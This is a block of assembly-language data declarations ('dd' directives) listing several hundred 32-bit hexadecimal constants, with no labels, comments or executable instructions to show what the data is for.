dd 6047261Ch, 0F9A0FDFCh, 0ED453146h, 875A5968h, 0DFA26CB1h
dd 0B421AC96h, 8CCB5666h, 753686D1h, 90588057h, 0E7FB4A95h
dd 5F7C88B3h, 0FCD75F9Ch, 40D0696Fh, 5F26D47Ch, 2E52A46Ch
dd 769093A5h, 54A68CDBh, 1E84C3D3h, 57903DD0h, 57F0C7B0h
dd 764B57E0h, 0E87A1BA5h, 532B4C5Ch, 0DF47AC0Ah, 89DC96DAh
dd 7FAF8CA5h, 0CCA4EAA0h, 0F363F99Bh, 2FA7AEA7h, 8BF8E56Eh
dd 97903B45h, 0A2995A37h, 15D8326Eh, 9D080FC6h, 0C77538C8h
dd 529E3020h, 6694CF10h, 6D100F09h, 32E5EC61h, 0E4FCDD4Ch
dd 66145F51h, 0D8CC5D2Eh, 7F97329h, 0AED2CF92h, 712F33C7h
dd 3BA43FE6h, 331FB2BAh, 78DCA4Ah, 0F8B47EBEh, 18593CF2h
dd 0CB6DCA06h, 5257092Dh, 0F9781622h, 0A07D5130h, 0A4F16938h
dd 0F1A8903Ah, 648A2A9Dh, 6857E1C1h, 40D0DFB7h, 670BDFC3h
dd 55C7BCECh, 4C95FD50h, 4FABBE43h, 0E899C35Fh, 0C34703F9h
dd 51C4BAEDh, 2A56375Ah, 2BEF82F4h, 9F96F8DFh, 3775C79Dh
dd 0CFD4C4C1h, 24E9AD0Bh, 0AD3EA1EDh, 48B6691Bh, 5CBCDAE1h
dd 0BEB4FB68h, 76694C5Eh
dd 0CE54893Bh, 8BFAB0EAh, 9CA0962Bh, 6FE0ABA3h, 0EAACAA5Dh
dd 0EC012B28h, 0E5C50244h, 0CDD6D1C1h, 0FBD636Eh, 5A472672h
dd 14298FD2h, 13E1062Eh, 6B357F31h, 35DD38B4h, 0B4DE6A10h
dd 0D22FB20Fh, 0FDB77705h, 2FC12F99h, 0B5D69133h, 0B5C5502Ch
dd 36652F75h, 381D31DCh, 289D75A0h, 4C16A78h, 10FD5249h
dd 7820F121h, 5F23B8CAh, 7F095689h, 6A479945h, 93872CF6h
dd 0BD48D18Dh, 0EE8189C6h, 40FA88B6h, 552A4695h, 0C7C1CAD1h
dd 0F0F5470Fh, 63D3FD6Bh, 813F1377h, 0B37109F9h, 94F2C118h
dd 0FDAAC26Dh, 551B5856h, 0DBE16E35h, 0DBB5449Bh, 0BEC7A43Fh
dd 6EB8F26h, 0BB64E6EAh, 8BC31F23h, 0C2DB0F35h, 0CE8B9472h
dd 827666CCh, 66C6D12Ah, 0B1661449h, 3DB71EE0h, 3476C955h
dd 384E08E7h, 0B7BB7CB5h, 2BB6DDFEh, 0EAAF322Ch, 7B152D0Ch
dd 0FBF2F5F6h, 0F05701D3h, 0EB0780C3h, 54A3595Bh, 8AEDA2BBh
dd 0B03FAB2Ah, 10BD8C47h, 7D14AEE7h, 193A030h, 3F54D555h
dd 29A3956h, 9BE4C9ADh, 7B1B9C2h, 79598B2Fh, 0AAA435C9h
dd 22BFECC6h, 0A26B025Ah, 0C2A5006Fh, 0E0789A88h, 1E3F2BEFh
dd 3712551Eh, 0B08122E8h, 0D5049EFDh, 3F0F2BB5h, 64080C86h
dd 0ED3BC07Bh, 7379615Dh, 4AD0E075h, 0F6FEA6DAh, 0AABDFB03h
dd 716A46Fh, 574FAF7Bh, 7E0B358Eh, 0F6E0B008h, 0AFE71524h
dd 185202B7h, 0ED3B0F13h, 0E4344CC2h, 3E1A5AC5h, 496592FBh
dd 30B4855Eh, 0A2897E84h, 0EB3B77FCh, 4DD6576Fh, 9C04971Eh
dd 10770589h, 82BC840Ch, 428511DAh, 55AAF4CAh, 0A7D66A68h
dd 49EEAA3Fh, 0B5AE2AD3h, 95BFE4E0h, 0D7B1F91Dh, 56E17892h
dd 0B5853E25h, 0E0796B53h, 2F6BE5A8h, 50D9757Ch, 0BB41653Bh
dd 85E9327Fh, 80AE1C63h, 0EB9C1FFEh, 0C6336AD4h, 4FC6801Fh
dd 6C6EA2F3h, 0FA79A908h, 1469CEA5h, 13D8774Dh, 14EB80B7h
dd 9E140D9Dh, 0EF0F174Bh, 6415A642h, 0BCB9BC02h, 66B2DA71h
dd 0FD17CC5Fh, 0BE233225h, 45DD3F3Fh, 13BF9D22h, 0A2C1049Ah
dd 0E0FA5068h, 0FC149051h, 939F4426h, 92E7B5FDh, 53E53C37h
dd 0CED79B68h, 0C0234A8Ah, 0C059500Ch, 4D9664EAh, 95D80C90h
dd 3162FEB1h, 0DFC87E37h, 0CE9E0CC9h, 0E8A60D75h, 35D2562h
dd 6F2B3D3Eh, 95520564h, 0DC70D437h, 0EF9A2BE8h, 4F113214h
dd 0E4EFB12Eh, 62EBA2D2h, 0FDFDF5FFh, 3014D85Dh, 784555D4h
dd 6D179E30h, 0FEC0D498h, 9E086247h, 266AF463h, 744C8640h
dd 24FEBD05h, 0A9636763h, 5A59FE60h, 0F3F723AEh, 2EB73B45h
dd 0F3C19DF7h, 0FE5A1956h, 0D517B6C5h, 2F559188h, 9E15F159h
dd 0BB2558A2h, 61759F0Dh, 5F271D68h, 521A13F1h, 0A8E6DB51h
dd 7769FF7Ch, 0AEF21BCFh, 1B08F1D8h, 0A6A8666Dh, 737C1D6Bh
dd 0CE051864h, 85FDA52Eh, 4BF717F3h, 98C217FCh, 8BE9F12Bh
dd 8C04CB20h, 3066B296h, 0A8CFA49Fh, 0B3C3C59h, 0D990E76Ah
dd 0C95A68EBh, 8A5EC6E7h, 0A44F32A6h, 45C19CF2h, 0BB5DB96Eh
dd 9F76C73Dh, 0F143CFB3h, 0F1ADA89Eh, 157A30BEh, 78EF1D2h
dd 3F6C647Fh, 0EE4062E9h, 3AF6F9CAh, 93EFD024h, 4CBE4791h
dd 72659F7Ch, 0B17E1852h, 686D950h, 0DECB7752h, 0C75219Ah
dd 284B7C9Fh, 5EAC1FF9h, 6B46A131h, 0F0A6AE77h, 1AAF9271h
dd 0A862846Ch, 0BFD2AADCh, 7D54051h, 7E798A77h, 8BFD17B4h
dd 0A152927Fh, 867122C4h, 6DE065D9h, 74FB6055h, 5CD77C49h
dd 0A5C615E8h, 0E51CE6F6h, 0A63EEDF3h, 73A7E1D8h, 0DD4BE10Ch
dd 7F530289h, 1525FAF7h, 0FC4258C1h, 0A4B4F2C2h, 0D2D3B671h
dd 0E0BA76EEh, 0EFA40319h, 966AEE7Ah, 79BE99B2h, 66ED6263h
dd 0F31AABC6h, 1FDF185Eh, 440358AAh, 4425F519h, 4ED7D524h
dd 9FF6A7DDh, 6FDD62FBh, 167354D4h, 712A15FDh, 0D3B2F96h
dd 0D672025Bh, 0B95903C7h, 6C1C2DD6h, 0CB257510h, 19288D72h
dd 0C63346EDh, 0DCD736EBh, 87E21F0Eh, 75E5933h, 0BFE23611h
dd 5E1740BCh, 75E834B7h, 0D461A6D4h, 5F1974E8h, 6556F81Ch
dd 0F4437430h, 541A558Eh, 0C015A4E6h, 54C96591h, 0F1C6905Bh
dd 98E04876h, 6C1BC4F3h, 4CCF397h, 4DCC41A5h, 1B58AE7Dh
dd 2BF73A73h, 42575912h, 287EE8B4h, 0FC039D82h, 4B472637h
dd 0CB12069Bh, 0E21A0CD0h, 69DCCAEh, 699A2F87h, 5FC41309h
dd 6CFAA1A1h, 4BA8C625h, 9F902F1Bh, 0C594D86Fh, 908E54EBh
dd 41F37CBDh, 0A96835C5h, 208B4773h, 0DA27146Eh, 0DBA1417h
dd 0CE6872Eh, 522A198Ch, 55D064A0h, 7A9F3F63h, 0A57DE7E1h
dd 0A568991Bh, 652A0452h, 82E1B2FDh, 0E2059494h, 0F104C36Eh
dd 492AC9Ah, 4716120Ch, 0AE33EF76h, 0F77617B7h, 84AE6824h
dd 0BCE38D8Fh, 589BE4EDh, 0BA08607Bh, 0C3C1DDF3h, 0DD33BC2Ch
dd 4D3BD84Ah, 554615E5h, 261CE3EBh, 0F7F8A5Ch, 2F0A5A7Ch
dd 1B849D03h, 56FAB73h, 63CA6C5Dh, 8FB70CE8h, 0BD80497Ah
dd 36E3431Bh, 0F308AE86h, 0C0387D78h, 0F6AC0CDAh, 0B5401BF5h
dd 7E6CA0D1h, 77916A5Fh, 0A24AD2E5h, 75D24C5Ch, 6B6F9DA2h
dd 0A9BBF948h, 73923C95h, 1F8B6FA5h, 92372625h, 0FEB0AFB7h
dd 1640D5C0h, 7C0765F6h, 715E3525h, 0BD2C1C84h, 6921AE43h
dd 0B0A760C1h, 83B5E637h, 57B63C92h, 789BABE1h, 8A3B2F21h
dd 651FC334h, 0C56D0FC0h, 157FF3D4h, 0ADEEBD0h, 1A16A553h
dd 8E0755CBh, 0CF48FF88h, 8D6D8779h, 0BFA1F60Ah, 109B438Ch
dd 0F39074BFh, 0CC0CEC62h, 0BA45BECCh, 81F131AFh, 0EC03BEC0h
dd 86674B13h, 0DB0D5C0Ch, 389EEB01h, 52D9E44Ah, 0C4B365A5h
dd 5A338AC5h, 0C424A54Ah, 70F55655h, 0ADFCE2DAh, 0DC74D22Eh
dd 5F949325h, 6F9D2977h, 9D22015h, 1BED6776h, 8C0D1557h
dd 0F415F4AFh, 631EAAACh, 91D5C0F2h, 9F9FBD76h, 159EB423h
dd 22EC09EEh, 88B70D46h, 0EF62BCDFh, 0A76222FAh, 22A36FCFh
dd 0A40AFF34h, 9EE2466Eh, 0E8FB08C0h, 0CC28800Eh, 0F6B4302Bh
dd 1917A709h, 27B7C7Fh, 2FA44873h, 84C68A20h, 620D09F6h
dd 7518F4F4h, 424D1434h, 3546E3D1h, 86344531h, 432C38D1h
dd 206A6285h, 798B69F3h, 0D11A8553h, 24F81D1Dh, 0A0C9C1D6h
dd 5992077Eh, 3A0F74D2h, 5AB57D93h, 84D66301h, 5C109FD0h
dd 0AB96540Eh, 85BF56B2h, 0BC9395FFh, 0C6CDB6ECh, 0C8D57ACEh
dd 0BFBE8CE2h, 30D07C2Ch, 10A6EE40h, 0CCD82C5Eh, 78CCDED2h
dd 0BA47F9B4h, 86B4D894h, 13E9C6D8h, 196B4349h, 0B4EFE078h
dd 0BAA54C5Fh, 642694C8h, 0EDAB626Fh, 0FD956EA0h, 97C0C4E2h
dd 0E57E329Dh, 1CD8F43Dh, 6EAA4BBh, 50D87E32h, 46D9872Dh
dd 0E1A200AFh, 2BDB9C87h, 0C55AD8E2h, 0E4CC51EBh, 2FB1B381h
dd 0ABCF6799h, 92AA7FCFh, 0AD68DE55h, 3835AEEAh, 0BF8D94FAh
dd 9F86CE6Fh, 0A1D4080Fh, 0E52FD175h, 98B955DAh, 11BB353h
dd 0AF4EA3F7h, 0CC7E801h, 0D4487ABFh, 3E09F960h, 0F7B92F30h
dd 22860CD8h, 0EF7E5D2Ch, 0A478EE74h, 27142C8Bh, 6CEFDD69h
dd 81F7CC81h, 94EE76BDh, 0B7235C6Ah, 0A917D17Fh, 0CCF011CFh
dd 0E253E346h, 4BC3F5CBh, 1AD55DF7h, 0C62D37BFh, 7C822726h
dd 5727181Eh, 0A05C11AEh, 0D515ECCFh, 0CA0D23B0h, 0EA1F9BE7h
dd 0EAF289C6h, 0C066E57Fh, 636689D1h, 8298B173h, 0AF9B6BCDh
dd 0E93F9A9Ch, 819C8DC2h, 942AA171h, 9E153E8h, 1BA43C3Fh
dd 57B4C4BAh, 65673AC3h, 0DC804433h, 0CF7D8EE9h, 0EE6C83E6h
dd 5BBF8D2h, 0CE8F4E54h, 0BC53FDD9h, 0CEB80790h, 153C6AB2h
dd 780FE37Ch, 154A57h
dd 559A7C73h, 28938E75h, 5C73057Dh, 1DF60B10h, 0A8C001D7h
dd 9A50417Fh, 576E40AEh, 0D98611B4h, 6D170FA9h, 154BFE44h
dd 0D43048E5h, 4C3B16A8h, 4B8F3DDEh, 0FCDBF337h, 0C33C94C5h
dd 0CC6BC48Ah, 5E465777h, 0DAA72D28h, 43BD97BEh, 0DE159E69h
dd 8F389FB6h, 1E304CFAh, 382404ABh, 0B45057Ch, 63F8AFD5h
dd 4FA2DBDDh, 0A32E707Ch, 0BEC6055Ah, 0FC7F51D2h, 0A7E02E9Bh
dd 0C1354D4Bh, 2E0BFBAFh, 2BC0A8EEh, 0A06998D4h, 0ADD81285h
dd 0B45F4667h, 1E4B5671h, 0A17F62FFh, 53ADB619h, 0F51638A5h
dd 12EF0F43h, 932A8C2Fh, 2C08805Eh, 91571E4Fh, 6D3BFC3h
dd 0EA97B7BEh, 6AD85BA0h, 0BC6BB76Bh, 5F1EBFABh, 70243E6Ah
dd 0B4B7584Ah, 0CF207499h, 5AF0A25Ch, 0DE77683Ah, 0B4F1B4BAh
dd 2B76B044h, 3E75A39Ch, 83F16A0Dh, 4E9FEC34h, 0D64DD74Bh
dd 0A321FB46h, 0E616A468h, 54712E57h, 0DF13B0EEh, 0FAF86AB5h
dd 36DA1EC0h, 5DDBB8ADh, 0FD6AD184h, 9C51BEFEh, 0D817A375h
dd 1CC16909h, 0DBE1B0ADh, 0A91AC174h, 173DAB0Eh, 0E86C672Dh
dd 5C9C071Eh, 77121D7Dh, 0C1B40F96h, 0D34ECCCAh, 0A45DEFD9h
dd 0C60D15ABh, 0F9111BC3h, 0E181C8F4h, 0E0744993h, 3F1BE9E0h
dd 3A838E4Ch, 0F839DECCh, 0C787ECB1h, 2FC11E8Bh, 0E9D31D47h
dd 8AB5B4E8h, 66D285EEh, 2A014110h, 0B26B2591h, 49EE95DEh
dd 8A554CA0h, 0E94B6EF3h, 0D8CC7C0Fh, 14DB6DCCh, 240ABB31h
dd 968E063Fh, 634BA468h, 8F334E9Ah, 0F0E045Fh, 40D8D54h
dd 0FDC3E93Fh, 3EE640C2h, 5F37D2D4h, 0D0E6E80Eh, 8D75DAE2h
dd 0C57BEFE4h, 443FE7F0h, 5471399h, 92A6BFCAh, 0A726AE89h
dd 34AFBA57h, 0A51531Eh, 38D9B77h, 0A1C172AEh, 0D0D3C39Ch
dd 36CB1BE1h, 58560FC5h, 0D3A3AD61h, 0EA81144Dh, 6A5D1D50h
dd 9E0A49FFh, 607D8C48h, 662940BAh, 0BE75558Ch, 0D1645EB0h
dd 0B6CEE044h, 0D99C9DEEh, 0A75BE2E5h, 44D90FFAh, 3F1193BFh
dd 0AAA1EBC4h, 6A2E189Fh, 977D7A4Eh, 0C8E8B944h, 3CAFEA5Dh
dd 53C14E4h, 0A4D3D868h, 7DA8E559h, 0F2B5EDAh, 0F084DB1Ch
dd 0AC3181E7h, 70ABA92Dh, 0D465A192h, 6A82B6CCh, 66E3D66Ch
dd 7BD3AA38h, 88B3A089h, 5021229Fh, 3F3BE503h, 5912168Eh
dd 2FB949B5h, 0C09795CEh, 31F725F6h, 14AEDBD1h, 317D07E4h
dd 0C7C4854Dh, 6EA6294Ch, 0CEA21324h, 605B8DDBh, 62FB6C73h
dd 6889BEC6h, 2B6B4223h, 9C2D2BF3h, 22758260h, 46C55F63h
dd 46D5056Bh, 5E3B4115h, 0E1FA2926h, 50B84C36h, 8C774255h
dd 0E7F885A8h, 0EC21E894h, 1FCD5AC6h, 0C788F8E8h, 359C416Bh
dd 40D1B5C7h, 0A3011E1Ch, 0BA2AE864h, 0F82E617Fh, 92ABB03Eh
dd 0BD26F68Ch, 0F2A70321h, 53022B03h, 0DEFB7BF6h, 2FE2FC2Fh
dd 0E9267161h, 6B23F1E0h, 435500C3h, 0CA41823Bh, 3113ED08h
dd 2702BFA2h, 1546F416h, 0AF51CB7Fh, 0FF132B5Bh, 82AB69B1h
dd 0EA98982Ch, 12AD149h, 1A7470D4h, 68E85ECAh, 0E9AD978Fh
dd 8F3A765Ah, 0C70FFFA6h, 0A85A7989h, 1F1E17C6h, 0F0CE2556h
dd 37809DFBh, 580A5FB2h, 0A6FF5484h, 6BD7C802h, 4E44E0B4h
dd 67EB7EA9h, 5A38EF10h, 3E5333E0h, 0D4AA94C0h, 618174D8h
dd 0EAF035A7h, 0A735C8E6h, 0C394D753h, 0D0C8BA11h, 0F8BD5257h
dd 33A2C0F3h, 3ADC7D8Dh, 607D68C9h, 0C9CB23B1h, 8F37E624h
dd 0D4F93876h, 0E4DEC1C3h, 0FF6F7F9Ah, 16E87502h, 5CB5797Bh
dd 0C060D657h, 58DEE051h, 0ED567755h, 35594F76h, 0E35E968Dh
dd 0E28AA11Bh, 2FB9E0F3h, 0A32FE032h, 0C483D2C0h, 46B9ED70h
dd 3729B975h, 0F1607106h, 93D32E99h, 84697D67h, 424ECAAh
dd 0F6C21BA0h, 4059FB7Eh, 0AA416B61h, 0F426ECDEh, 2FE61F68h
dd 79AA79DFh, 0D9579C61h, 0FA9D3B1Eh, 5B7A174Fh, 2562BF28h
dd 90918299h, 12A5CAFBh, 0CA2FF56Fh, 5DF868C4h, 0F8BF7CD0h
dd 0C68B6E2Ah, 0AEDD2FDh, 0CF67ED68h, 0DE27BED2h, 0AFB671Eh
dd 63AD70D2h, 34C018ADh, 0DD23A343h, 0CAB45979h, 1AB54367h
dd 5B5D7B43h, 0EDD0AE80h, 249B5110h, 52C0D132h, 4DD5B6CCh
dd 8196A6F6h, 0BC0099E1h, 0A9CC7670h, 4B72A1E8h, 245E7497h
dd 72DC86DFh, 6A714BCAh, 3BCD86D2h, 2D736421h, 1CF46430h
dd 6698BD6Ch, 11F9EAA9h, 1C975D16h, 0BED8352Bh, 3DFEF971h
dd 99E0280Fh, 23307040h, 1693C4D6h, 80E09C9Ah, 22AE0FE8h
dd 0E2F80C92h, 0EAECE115h, 0BEDC6A2Ah, 0F86BB817h, 0EBD0362Dh
dd 9035FE59h, 0AA8B5098h, 0A8B2FBDCh, 6DB6C969h, 0FF271CC5h
dd 0A83AA040h, 0C4B62DB8h, 15EAE72Ah, 0F4665510h, 0EF41EB95h
dd 7D746031h, 0A502B03Fh, 26D18329h, 4474DEFCh, 68A939B8h
dd 0EB30CAE4h, 5BCF2A4Ah, 0AE8B785Ah, 9BB512EDh, 34CEA285h
dd 0CFB4BB90h, 0FACFE78Eh, 0A72D41C6h, 9CF0BE2Eh, 0EDEA4AAEh
dd 0E63A923Bh, 7BEB97E0h, 12C85C0Bh, 1CB47BB5h, 0D9A97B9Bh
dd 0F88E4D21h, 7521086Ah, 0B487D64Eh, 0C1D60B3Bh, 0AF9B590Fh
dd 0D4C7E343h, 0F05F9070h, 0D30D3F07h, 745BA776h, 157C7FA5h
dd 5851EDB0h, 0FD689E7Ch, 6D197FBDh, 28547E22h, 56C07889h
dd 0B8D2B551h, 8A96212h, 9B9495FEh, 88DE7D99h, 0D8B0D526h
dd 0A9E02547h, 8D8CC31Ah, 898B78FBh, 919A6355h, 59B8DA24h
dd 534A206Dh, 0B2AFC6E9h, 0DCA40676h, 0F22395C7h, 259405B9h
dd 0ED53C429h, 86E12AC9h, 1FCA858Eh, 7AD25C4Fh, 8AFBA9EEh
dd 0F08BD7C7h, 739A71DAh, 4993F2B6h, 32CDDFDDh, 0C6617858h
dd 94FCD401h, 76FE3B69h, 0F2056078h, 0D8F02EF2h, 0E107B91Bh
dd 25984AA5h, 7BBF5F8Eh, 327CA2E0h, 5B470E9Eh, 1870A9BDh
dd 553013C7h, 374B74F5h, 4F533E85h, 0D5DE07E5h, 3B933D7Ch
dd 0F5E34BF2h, 0F92E8AC7h, 0A13893F7h, 0C4C6AE05h, 109E828Ch
dd 0BC0393A7h, 5F0E878Ah, 0E249323Ch, 5B90D1B1h, 0BBF3D40h
dd 9F2B7F98h, 0AFF7F909h, 88D5EFC0h, 0AF00E44Bh, 5F87FF6Ah
dd 5FB05689h, 1D545FB1h, 5125ABB7h, 0D06DF2A0h, 7398558Eh
dd 31A47DD7h, 0A2C09B76h, 44F65BC1h, 0FF1997E6h, 6342DA52h
dd 0FB996E6Dh, 395667D2h, 106DABDAh, 31304350h, 0ED74DA75h
dd 0D4345AA2h, 0D6A3847Dh, 4866E827h, 7DF168FAh, 3F393290h
dd 794DF130h, 0B3A87D76h, 685F5A54h, 0F5F1F196h, 27E1C703h
dd 0BBC07DE9h, 492F8F2h, 9DDB4E25h, 7F3BEE26h, 0A35B8135h
dd 425F2A95h, 0EF33D88Ah, 5C4CC990h, 7A8D478Fh, 0D9C2B135h
dd 890D7D61h, 150B208h, 12E2A1B5h, 0D8F4A423h, 0C72A36FDh
dd 2AC2606Ah, 24E9C85h, 7DB9F3A5h, 37ABBF56h, 0EEA4091Bh
dd 3B11647h, 9144E42Dh, 94A411A9h, 146EE66Ch, 64AA2A9Dh
dd 0B25BE2F5h, 0F9B0D971h, 45F45AD2h, 2FAE6F9Dh, 0AE7A7FB0h
dd 58E07276h, 54A8DC9Eh, 5A85B63Ah, 7C51002Bh, 0D2025431h
dd 0B03EF15Fh, 6B1BA644h, 0EAB60E77h, 0A6E99958h, 5289C412h
dd 80AD80A7h, 0D227ABDAh, 5FB1E26Ah, 663EEBF7h, 5A8EEFFBh
dd 0F9A0D948h, 0D06DE9F8h, 9CC766DEh, 2059298Eh, 0D7F65866h
dd 52EE81FEh, 97400497h, 939EF8EDh, 34CF841Eh, 1F38B06h
dd 0B9ACB2D1h, 0E5311BBBh, 0F9D36126h, 0F6F22873h, 15103812h
dd 0F7942F74h, 4D03FDB9h, 811801CAh, 5D403D5h, 0D54AAABh
dd 34A1B8D8h, 0C7CCEB9Ch, 0C0E7DF47h, 79DD9E7Ch, 0AF126BBh
dd 88ED0FD8h, 0B4A07D16h, 0C42F4D6Bh, 0B8F978D4h, 0C57064F4h
dd 36575AAFh, 0E5AACE69h, 6F544B92h, 41E5630Ah, 80AF3031h
dd 87FB29C7h, 5308F322h
dd 3DF7938Eh, 6844B9CBh, 0EEB81AC8h, 87836D96h, 0D8F42EDFh
dd 0E1769580h, 0C842CE17h, 0C9F4FCD4h, 7CFEEACDh, 49B2D88Eh
dd 70946D0h, 0D3C5AF17h, 6B61AE62h, 82095406h, 0B64757Dh
dd 7E1EF428h, 0B4B2D668h, 0D53BC0AEh, 57926DA3h, 231C417Ah
dd 9F4CE4BAh, 0F820E8Eh, 621B5F87h, 0BA32D37Eh, 7EFBC2D9h
dd 0D30CB5DBh, 29FE6175h, 0D30B07B2h, 0F8D21DB3h, 3FBF4E52h
dd 96867411h, 0E15F4B4Ah, 1B712DDh, 0B4727059h, 8BA28D18h
dd 0E4DCE518h, 87DB86F6h, 0A982F7B0h, 74139F8Eh, 4A18ED46h
dd 0CB39104Dh, 97E31F37h, 70334390h, 535D52E6h, 61F8AEF1h
dd 12F7B742h, 4C2BE8A2h, 0B8B49809h, 55B6F600h, 342754EBh
dd 9AEA51BFh, 0E080812Ch, 68AF04E3h, 0BB5A53CBh, 0F16C671Dh
dd 0F8FB2781h, 0BAEAB33Ah, 30526717h, 0A0313BEh, 0EB6DDBF7h
dd 0B8BB1B4Ch, 3EA6B5EAh, 360BF712h, 6BA0CCBFh, 0BEED2D15h
dd 3D7E3112h, 3DB1C663h, 516802FBh, 0A5467A16h, 0CD2BAA44h
dd 0C25450F8h, 1F8D7DCDh, 6FEA1FEEh, 681AF7E1h, 0AE99DEC9h
dd 9130FD68h, 36DD1633h, 0E13FE03Ah, 92BE675Ah, 0A28CDE3Dh
dd 0AFDADBB5h, 0A573E58Ch, 3D3B4604h, 257E8E39h, 0BB0E4AF8h
dd 0E3976DABh, 3940C169h, 4CB00CBDh, 54A04B1h, 42E3FAFh
dd 0DDA33912h, 9FD1E748h, 0B259E135h, 57061D60h, 0E9B8C18Dh
dd 0DAC9B208h, 69D0D559h, 0EF04459Ah, 0F4B7B398h, 7805CF9Bh
dd 3B5894A0h, 0BB7FB768h, 0DF6993A9h, 0CE7C1689h, 5DCE6396h
dd 53E77FFh, 9EC9BF4Ah, 7FF4EAAh, 81EF65A7h, 5F357251h
dd 4A59C78Ch, 0A30D78B9h, 5CDD59BDh, 952DE4D0h, 0C96262A3h
dd 57159843h, 4CF97BB4h, 91DC89D8h, 679C7D99h, 8B44A7F8h
dd 0AB84D58Ch, 879E8F4Ah, 4200ADA3h, 0C67580CAh, 34BFBE0Ah
dd 8BE9F99Dh, 65A8C755h, 7D551AE3h, 7FA0D8E0h, 40F9FDCCh
dd 91CAA14Ah, 2087AB16h, 0C0915CBAh, 59BA8F01h, 63C1481Dh
dd 0ADD6DC3Bh, 97F53B57h, 0E7A944A7h, 3BD46AA0h, 0D0D4A39Ah
dd 9981C3BEh, 875352FBh, 8547F080h, 2AD38987h, 0C5F30DD7h
dd 1E4CCFE6h, 2BBBEBF8h, 0C5EDEEE5h, 0D0B817F0h, 0C01BBC73h
dd 0FD916FC9h, 0FD4583D0h, 0F237892Fh, 8BC28661h, 4B45504Eh
dd 74D55476h, 0CBAB29E9h, 83AF9DC5h, 0BDBB1B8Dh, 98480C8Bh
dd 7AAE6936h, 0B331425Eh, 45DF73ACh, 6BDA6DDCh, 53D1CFEBh
dd 0BBD47DACh, 0BE3CF9AAh, 2B8A2905h, 0EB1C4DAh, 0F4CB8D67h
dd 0F64F75EFh, 0C2FFCE2h, 386255BCh, 0BEBFC566h, 0B9AFFBBh
dd 0D7425DD8h, 2FF9C5D9h, 748EC4D0h, 10E88284h, 3A49D1F9h
dd 0BDF7A24Ch, 0A3D1C4A7h, 8C0FD989h, 1C3CCAAEh, 82DB7C54h
dd 404CE543h, 2332670Dh, 0E4859BEDh, 0DF6685F2h, 743FCBF0h
dd 7550BE4Eh, 5D6419D3h, 8E737CF3h, 8E8E5BC8h, 0AD9983CDh
dd 0B6944710h, 98147CD4h, 0AB94036Bh, 162B7F30h, 0D577CD39h
dd 2FEAA3E1h, 1D899DA5h, 7CFF55ADh, 3D2F2FF6h, 5F8C499Bh
dd 4CEFEF42h, 0DB1D729Fh, 446FB84Ch, 0A928B286h, 3FD41976h
dd 664E4C54h, 0C47D6D6Ah, 5784630Fh, 0A122BA42h, 0CA05C82Fh
dd 0F4AE7438h, 3A72933Eh, 0F7E97895h, 51C36391h, 3358707Ch
dd 1E811D85h, 4A5F256Ch, 0BF98BEB1h, 0CDE7523Dh, 1B1FA0E6h
dd 0BF7AA1F8h, 0D5B9708Ah, 8B55B5A2h, 9869BBDEh, 46F8A8EBh
dd 6A66DFEBh, 0E6E12D90h, 6B74E450h, 2E1B7E72h, 56A20FBCh
dd 1DB89B7Fh, 285AEB0Bh, 0A33DFA80h, 2A1E86B0h, 42D1647Ah
dd 2C9C5CAEh, 0F8A421D4h, 1014D5E9h, 0BF8678F7h, 6A3E4D0Dh
dd 0A7507707h, 0E88F0677h, 16820AD4h, 0E5AE717Ah, 0DECA51B1h
dd 0DF59C0D0h, 2DC005D7h, 0E8F0D348h, 0E3F9E3CAh, 0F2574E2Bh
dd 0A65E82CCh, 40C2886Ch, 4A96D445h, 0BDFA8ABCh, 6B953B31h
dd 8DD2F2BBh, 0E9ECB390h, 12731F89h, 28205F2Ch, 24AD6D74h
dd 0D6979AECh, 0EEE00D1Fh, 73454A2Fh, 274578B5h, 9A0132C9h
dd 0FD731A0Fh, 981F5E23h, 0F9115975h, 6D0F1707h, 0A976AA01h
dd 1FD448A6h, 0DA2C9727h, 66F293A9h, 3F133898h, 7739B7C1h
dd 0C71E03DAh, 6E52B38Eh, 8A5BD1C2h, 7CED6FDDh, 0BCA4CCC7h
dd 2D59A6DDh, 94BCCCFEh, 0D84E54FEh, 0D5412C56h, 0C0C9FD31h
dd 0E4489C73h, 710C6B92h, 804AC057h, 74AE4B45h, 7E7B4969h
dd 0A4A75056h, 0AB70EB45h, 0DFF57B08h, 915E1C3Bh, 71654303h
dd 0EFC4A1CEh, 0C1E0FC11h, 18E4FE17h, 1650440Dh, 64CFDBBBh
dd 244AD1CDh, 3C7F156h, 0A475E5FBh, 5F8285DCh, 0EE2CBB44h
dd 0B3C53F5Fh, 49689965h, 59BB84F8h, 0C60605F8h, 5DEA95A7h
dd 0B11E1EA8h, 0DE096A5Ch, 55FB6E23h, 0C8CD176Eh, 0A9B09CAEh
dd 12D542FCh, 2B4A8A0Dh, 4A075C20h, 11BC878Ch, 0F5FCC8B4h
dd 1D7ED633h, 85730F9Fh, 59FEDE48h, 14E56C46h, 0F8097F41h
dd 2A3755E1h, 454ADD08h, 0A6F952F9h, 886E8B8Bh, 0DF0A2AF6h
dd 0E66832A7h, 339E4F7Ch, 0BB787A81h, 2F9DBEF2h, 0D6E8B76Ah
dd 0D0C8EB36h, 65AAE59h, 3D357F0Eh, 0A26B46F7h, 8A86A92Eh
dd 7EB61401h, 29852574h, 0EAFB778h, 0EA8B7CC8h, 93C4E55Ch
dd 0D6B8D5A3h, 6B03A776h, 0E2FE6D2Eh, 0FF7DCFC4h, 0A3E1D112h
dd 0A4EEED42h, 688217C9h, 287E67CFh, 55CAB902h, 2CA4D120h
dd 3ACF26E6h, 8B097BBFh, 0E3504453h, 78AB58A8h, 0DCE3A870h
dd 0DB771C90h, 5FE57195h, 773EEE66h, 59AC0F90h, 14E10DEAh
dd 0F4537391h, 0ED036620h, 0A874AAD9h, 0D295AF2Bh, 589718B4h
dd 2B2F6B9h, 7903E2Ch, 58F1CAF7h, 0D357A662h, 1AACD5D2h
dd 49A4C818h, 0A6559480h, 0CF00CB80h, 5627205Fh, 0FA00863h
dd 0FBF1892Ch, 0A3F6CCBFh, 0C4C35CD0h, 8B759194h, 9C63FACBh
dd 0FB204CEAh, 58A5630Ah, 0FC322EEh, 0EFA73EADh, 0E372532Bh
dd 0A9AB3B2Dh, 35C67310h, 0F048AAD5h, 0D7F66FB8h, 2609F832h
dd 93F70A6Dh, 0C9BBFFB6h, 29470FC2h, 967AAED6h, 0E5819C8Fh
dd 553FAF8Bh, 6AA2AC95h, 83E2EB57h, 355FE1BDh, 7B07931h
dd 4946C2AEh, 2D198C70h, 0E2527025h, 9A1F3D99h, 82B82AACh
dd 45B0A404h, 5DC0CA89h, 61F1D291h, 8C5EF64Ch, 525572D9h
